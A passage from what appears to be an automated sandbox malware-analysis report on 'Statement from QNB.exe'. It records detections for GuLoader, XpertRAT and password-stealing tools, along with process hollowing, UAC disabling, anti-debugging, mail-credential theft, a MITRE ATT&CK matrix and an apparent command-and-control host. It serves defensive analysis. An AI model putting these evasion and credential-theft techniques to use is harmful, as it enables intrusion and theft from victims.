                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_005720CD mov eax, dword ptr fs:[00000030h]25_2_005720CD
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_00572CF6 mov eax, dword ptr fs:[00000030h]25_2_00572CF6
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_0056D0BD mov eax, dword ptr fs:[00000030h]25_2_0056D0BD
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_2_00574D65 mov eax, dword ptr fs:[00000030h]25_2_00574D65
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_005720CD mov eax, dword ptr fs:[00000030h]26_2_005720CD
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_00572CF6 mov eax, dword ptr fs:[00000030h]26_2_00572CF6
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_0056D0BD mov eax, dword ptr fs:[00000030h]26_2_0056D0BD
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 26_2_00574D65 mov eax, dword ptr fs:[00000030h]26_2_00574D65
                    Source: C:\Users\user\Desktop\Statement from QNB.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_022FD72E LdrInitializeThunk,0_2_022FD72E
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CF697A RtlAddVectoredExceptionHandler,22_2_02CF697A

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    Sample uses process hollowing techniqueShow sources
                    Source: C:\Users\user\Desktop\Statement from QNB.exeSection unmapped: C:\Program Files (x86)\Internet Explorer\iexplore.exe base address: 400000Jump to behavior
                    Writes to foreign memory regionsShow sources
                    Source: C:\Users\user\Desktop\Statement from QNB.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 401000Jump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 442000Jump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 2C50008Jump to behavior
                    Allocates memory in foreign processesShow sources
                    Source: C:\Users\user\Desktop\Statement from QNB.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processesShow sources
                    Source: C:\Users\user\Desktop\Statement from QNB.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeProcess created: C:\Users\user\Desktop\Statement from QNB.exe "C:\Users\user\Desktop\Statement from QNB.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Users\user\Desktop\Statement from QNB.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" Jump to behavior
                    Source: iexplore.exe, 0000000C.00000002.85677855007.0000000003048000.00000004.00000020.sdmpBinary or memory string: H100|0h 0m 0s|1076|Program Manager|108S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.pas28- 405_
                    Source: iexplore.exe, 0000000C.00000002.85677855007.0000000003048000.00000004.00000020.sdmpBinary or memory string: H100|0h 0m 0s|1076|Program Manager|10illa\sitemanager.xmlI1C4O6V0D4\nyuimqkss4txtkss4.txt">
                    Source: iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmpBinary or memory string: 0|Test - Xpert|United Kingdom|user - 405464|2.10.0|GB|0h 0m 0s|3.0.10|1|-4|0|Program Manager|X||]-[O$
                    Source: iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmpBinary or memory string: D100|0h 0m 0s|1076|Program Manager|2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss3Y1-J1N8-O887-M0I1C4O6V0D4.pas
                    Source: iexplore.exe, iexplore.exe, 0000000C.00000002.85678878066.00000000037E1000.00000002.00020000.sdmpBinary or memory string: Program Manager
                    Source: iexplore.exe, 0000000C.00000002.85678878066.00000000037E1000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: Statement from QNB.exe, 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, iexplore.exe, iexplore.exe, 0000000C.00000002.85678878066.00000000037E1000.00000002.00020000.sdmp, iexplore.exe, 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 0000000C.00000000.80980312275.0000000000400000.00000040.00000001.sdmpBinary or memory string: Progman
                    Source: iexplore.exe, 0000000C.00000002.85678024206.0000000003055000.00000004.00000020.sdmpBinary or memory string: 100|0h 0m 0s|1076|Program Manager|15
                    Source: iexplore.exe, 0000000C.00000002.85678024206.0000000003055000.00000004.00000020.sdmp, iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmpBinary or memory string: 100|0h 0m 0s|1076|Program Manager|10
                    Source: iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmpBinary or memory string: $100|0h 0m 0s|1076|Program Manager|10 yE971
                    Source: iexplore.exe, 0000000C.00000002.85678024206.0000000003055000.00000004.00000020.sdmpBinary or memory string: 100|0h 0m 0s|1076|Program Manager|12
                    Source: Statement from QNB.exe, 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 0000000C.00000000.80980312275.0000000000400000.00000040.00000001.sdmpBinary or memory string: Program ManagerCopyHere
                    Source: iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmpBinary or memory string: Program Manager10 y 4*w
                    Source: iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmpBinary or memory string: 0|Test - Xpert|United Kingdom|user - 405464|2.10.0|GB|0h 0m 0s|3.0.10|1|-4|0|Program Manager|X|||x-<O#
                    Source: iexplore.exe, 0000000C.00000002.85678878066.00000000037E1000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                    Source: iexplore.exe, 0000000C.00000002.85678024206.0000000003055000.00000004.00000020.sdmpBinary or memory string: 100|0h 0m 0s|1076|Program Manager|12?
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_0041691B GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,17_2_0041691B
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_00406B06 GetVersionExA,14_2_00406B06
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_00407C79 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,14_2_00407C79

                    Lowering of HIPS / PFW / Operating System Security Settings:

                    barindex
                    Disables user account control notificationsShow sources
                    Source: C:\Users\user\Desktop\Statement from QNB.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security CenterJump to behavior
                    Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                    Source: C:\Users\user\Desktop\Statement from QNB.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center UACDisableNotifyJump to behavior
                    Disables UAC (registry)Show sources
                    Source: C:\Users\user\Desktop\Statement from QNB.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected Generic DropperShow sources
                    Source: Yara matchFile source: 12.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.80975835945.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.80980312275.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.80977316956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.80978780847.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Statement from QNB.exe PID: 3232, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: iexplore.exe PID: 1736, type: MEMORYSTR
                    Yara detected MailPassViewShow sources
                    Source: Yara matchFile source: 16.0.iexplore.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.0.iexplore.exe.400000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.0.iexplore.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.0.iexplore.exe.400000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.0.iexplore.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.0.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.0.iexplore.exe.400000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.0.iexplore.exe.400000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.0.iexplore.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.0.iexplore.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000003.81136331884.0000000005E20000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000000.81127160331.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000000.81129202432.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.81205248968.0000000005DE0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.81103105159.0000000005DD0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.81120321422.0000000003091000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.81102180166.0000000005DA1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000000.81130233674.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000000.81127982382.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.81119221282.0000000005DA1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.81119604744.0000000005DE0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: iexplore.exe PID: 1736, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: iexplore.exe PID: 3544, type: MEMORYSTR
                    Yara detected XpertRATShow sources
                    Source: Yara matchFile source: 12.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.80975835945.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.80980312275.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.80977316956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.80978780847.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Statement from QNB.exe PID: 3232, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: iexplore.exe PID: 1736, type: MEMORYSTR
                    GuLoader behavior detectedShow sources
                    Source: Initial fileSignature Results: GuLoader behavior
                    Tries to steal Mail credentials (via file registry)Show sources
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword16_2_00402D9A
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword16_2_00402D9A
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: ESMTPPassword16_2_004033D7
                    Yara detected WebBrowserPassView password recovery toolShow sources
                    Source: Yara matchFile source: 12.3.iexplore.exe.5f1a8d8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.iexplore.exe.400000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.iexplore.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.3.iexplore.exe.5f1a8d8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.iexplore.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.iexplore.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.iexplore.exe.400000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.iexplore.exe.400000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.iexplore.exe.400000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.iexplore.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.3.iexplore.exe.5f1a8d8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.iexplore.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.3.iexplore.exe.5f1a8d8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.81143708925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.81144880094.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: iexplore.exe PID: 1736, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: iexplore.exe PID: 2448, type: MEMORYSTR

                    Remote Access Functionality:

                    barindex
                    Yara detected XpertRATShow sources
                    Source: Yara matchFile source: 12.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.iexplore.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.80975835945.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.80980312275.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.80977316956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.80978780847.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Statement from QNB.exe PID: 3232, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: iexplore.exe PID: 1736, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsNative API1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools3Input Capture11System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsShared Modules1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1Credentials in Registry1Account Discovery1Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Registry Run Keys / Startup Folder21Bypass User Access Control1Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Access Token Manipulation1Software Packing1NTDSSystem Information Discovery8Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptProcess Injection412DLL Side-Loading1LSA SecretsSecurity Software Discovery331SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder21Bypass User Access Control1Cached Domain CredentialsVirtualization/Sandbox Evasion21VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncProcess Discovery4Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion21Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection412Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 527846 Sample: Statement from QNB.exe Startdate: 24/11/2021 Architecture: WINDOWS Score: 100 43 z1s.us.to 2->43 45 googlehosted.l.googleusercontent.com 2->45 47 4 other IPs or domains 2->47 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 GuLoader behavior detected 2->61 63 9 other signatures 2->63 9 Statement from QNB.exe 1 2->9         started        12 D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe 1 2->12         started        14 D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe 1 2->14         started        16 D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe 1 2->16         started        signatures3 process4 signatures5 77 Tries to detect Any.run 9->77 79 Hides threads from debuggers 9->79 18 Statement from QNB.exe 1 7 9->18         started        22 D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe 7 12->22         started        24 D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe 7 14->24         started        26 D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe 7 16->26         started        process6 dnsIp7 49 drive.google.com 142.250.185.78, 443, 49804, 49827 GOOGLEUS United States 18->49 51 googlehosted.l.googleusercontent.com 142.250.186.97, 443, 49805, 49828 GOOGLEUS United States 18->51 65 Changes security center settings (notifications, updates, antivirus, firewall) 18->65 67 Disables user account control notifications 18->67 69 Writes to foreign memory regions 18->69 75 4 other signatures 18->75 28 iexplore.exe 3 8 18->28         started        53 docs.google.com 172.217.168.14, 443, 49829 GOOGLEUS United States 22->53 71 Tries to detect Any.run 22->71 73 Hides threads from debuggers 22->73 signatures8 process9 dnsIp10 55 